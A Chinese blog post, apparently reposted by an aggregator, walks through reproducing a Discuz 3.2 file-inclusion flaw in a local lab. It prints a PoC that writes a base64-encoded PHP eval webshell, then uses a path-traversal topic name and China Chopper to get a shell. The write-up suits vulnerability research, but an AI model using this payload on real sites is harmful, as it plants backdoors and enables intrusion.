2019-11-12:Discuz3.2漏洞文件包含漏洞复现

Posted sym945

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2019-11-12:Discuz3.2漏洞文件包含漏洞复现相关的知识,希望对你有一定的参考价值。

*文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

Discuz3.2漏洞文件包含漏洞复现,由于创建专题时未对 ,静态化名称,做任何限制引发此漏洞问题,问题出在代码中的函数check_seccode(),该函数在/source/class/helper/helper_seccheck.php中,作用是检查验证码是否正确。在后台的防灌水功能中可以设置验证码类型,对应的变量是$_G[‘setting‘][‘seccodedata‘][‘type‘],该值在进入数据库前未做安全检查。check_seccode()取出该值时也没有检查是否合法,导致漏洞产生。

一、环境搭建

1,下载源码,解压到phpstudy的网站根目录,浏览器访问网站,点击同意,开始安装

技术图片

2,自行设置好网站管理员账号,密码,数据库信息等,安装即可

技术图片

3,等待安装完成,即可

技术图片

4,安装完成

技术图片

二、漏洞复现

1,本次复现漏洞是在网站后台管理界面,所以需要登录后台,浏览器访问搭建的论坛的admin.php后台界面,输入安装时候设置的管理员账号,密码,提交登录进入管理后台

技术图片

 

技术图片

2,点击,全局,站点信息,在网站URL后边加入poc,#<?php file_put_contents(‘0.php‘,base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4=‘));?>,点击提交

 技术图片

 3,点击,进入工具页面,更新缓存,确定更新缓存,等待更新完成

 技术图片

4,点击,门户,生成html选择是, 静态文件扩展名一定改成htm的,专题存放目录选择data/cache,点击提交

技术图片

 5,还是 门户界面,选择 专题管理

技术图片

6,点击 创建专题,专题标题输入任意都行,静态化名称没有做任何限制,要输入,../../template/default/portal/portal_topic_test,还要勾选 站点尾部信息,之后点击提交

技术图片

7,返回专题管理界面, 勾选新创建的专题,选择开启,提交,开启之后,才能选择 生成

技术图片

 

 技术图片

 技术图片

 

技术图片

8,重新点击创建专题,专题标题一样随便写,静态化名称也是随便写,模版名一定要选择之前新创建的模版,点击提交

技术图片

9,进入网站根目录,会发现脚本执行成功,生成了一个shell.php脚本

技术图片

技术图片

 10,菜刀连接url,成功getshell

技术图片

 技术图片

以上是关于2019-11-12:Discuz3.2漏洞文件包含漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

Discuz3.2 新用户插入数据库SQL

2019.11.11~2019.11.12考试总结

如何像这样(2019-11-12T10:26:39.613Z)将unix epoch datetimeformat保存到models.DateTimeField中

2019-11-12给自己退路,其实给自己胡同路

Apache 欢迎页面也可访问到,文件目录下的其他文件却访问不到

文件上传漏洞成因是啥?